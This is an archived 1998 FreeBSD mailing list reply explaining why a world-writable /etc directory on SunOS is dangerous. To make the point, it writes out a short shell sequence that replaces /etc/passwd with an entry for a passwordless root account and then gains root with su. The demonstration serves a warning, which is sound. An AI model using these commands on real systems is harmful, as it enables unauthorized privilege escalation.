Date: Thu, 17 Dec 1998 22:04:04 -0500 (EST) From: "Crist J. Clark" <cjc@cc942873-a.ewndsr1.nj.home.com> To: marko@uk.radan.com (Mark Ovens) Subject: Re: Basic Security Question Message-ID: <199812180418.XAA17904@cc942873-a.ewndsr1.nj.home.com> In-Reply-To: <3678D0CF.7FA8B106@uk.radan.com> from Mark Ovens at "Dec 17, 98 09:37:19 am"
next in thread | previous in thread | raw e-mail | index | archive | help
Mark Ovens wrote,
> and on all the Sparcs running SunOS4.1.3_U1 here are:
>
> gppsun4:/{8}% ls -ldug etc
> drwxrwsrwx 10 bin staff 2048 Dec 17 09:30 etc
>
> which is even less secure as it's writable by all!
I may be dense. Is that some kind of joke or something? As dense as I
am, I know for sure that even I could take any account on a system
with permissions like that and have control of root in this many
keystrokes:
% cd /etc
% echo "root::0:0:Evil Root:/:/bin/csh" > passwd.new
% mv passwd passwd.old
% mv passwd.new passwd
% su
#
BUWHAHAHA!
--
Crist J. Clark cjclark@home.com
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199812180418.XAA17904>